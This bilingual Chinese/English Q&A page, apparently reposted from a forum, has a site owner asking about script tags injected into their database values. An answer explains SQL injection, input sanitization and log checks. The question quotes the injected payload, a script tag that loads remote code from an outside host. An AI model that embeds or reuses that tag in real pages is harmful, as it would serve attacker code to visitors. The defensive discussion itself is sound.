我的数据库值被注入 [英] My Database Values are injected with
本文介绍了我的数据库值被注入的处理方法,对大家解决问题具有一定的参考价值,需要的朋友们下面随着小编来一起学习吧!
问题描述
我的数据库表值注入了脚本< script src ="http://global.menotepoer.com/sl.php?v=2"> .从来没有遇到过这个问题.我现在已经临时恢复了我的数据库.请帮助我永久摆脱此问题..
My Database table values are injected with the script <script src="http://global.menotepoer.com/sl.php?v=2"> . Never came across this issue.i have restored my database now temporarily.Please help me to get out of this issue permanently..
推荐答案
我认为,您一直是通过SQL注入进行黑客攻击.您需要立即采取行动.
SQL注入是最常见的黑客攻击方式之一,也是最危险的一种.不过,您可以通过采取适当的措施将风险降到最低.
在大多数情况下,
1.您尚未在常见页面(如常见问题解答)中清除用户输入的内容,请与我们联系.
2.或者您还没有在页面中清理查询字符串.
攻击者的行为是追加一个SQL查询,以读取所有表名和列名,并在这些列中插入一些链接.
要检查到底发生了什么,请检查服务器的IIS日志.在那里,您会发现一些奇怪的URL.
作为直接措施,请参阅是否可以阻止可疑IP(可以通过分析IIS日志获得)".您可以编写查询以对此类可疑单词进行全索引搜索,以查看您是否被感染.
您需要做一些阅读才能停止.
SQL注入:
http://en.wikipedia.org/wiki/SQL_injection [ http://msdn.microsoft.com/en-us/library/ms161953 (v = sql.105).aspx [ SQL注入攻击以及有关如何预防的一些提示他们 [ ^ ]
希望有帮助.
Milind
I think, you have been a victin of hacking through SQL injection. You need to take immediate action.
SQL injection is one of the most common mode of hacking attack and most dangerous one too. Though, you can minimize the risk by taking appropriate measures.
In most cases,
1. you have not sanitized user-input in common pages, like FAQ, contact us.
2. Or you have not sanitized the query-string in the page.
What an attacker does is append an SQL query to read all table names and column name and insert some links in those columns.
To check exactly what has happened, check IIS log of the server. There you will find some strange URLs.
As immediate measure, See, if you can block suspsected IP (that you may get from analyzing IIS logs). You may write a query to do a full index search for such suspected word to see if you are infected.
You will need to do some reading to stop.
SQL Injection:
http://en.wikipedia.org/wiki/SQL_injection[^]
http://msdn.microsoft.com/en-us/library/ms161953(v=sql.105).aspx[^]
SQL Injection Attacks and Some Tips on How to Prevent Them[^]
Hope that helps.
Milind
这篇关于我的数据库值被注入的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
查看全文
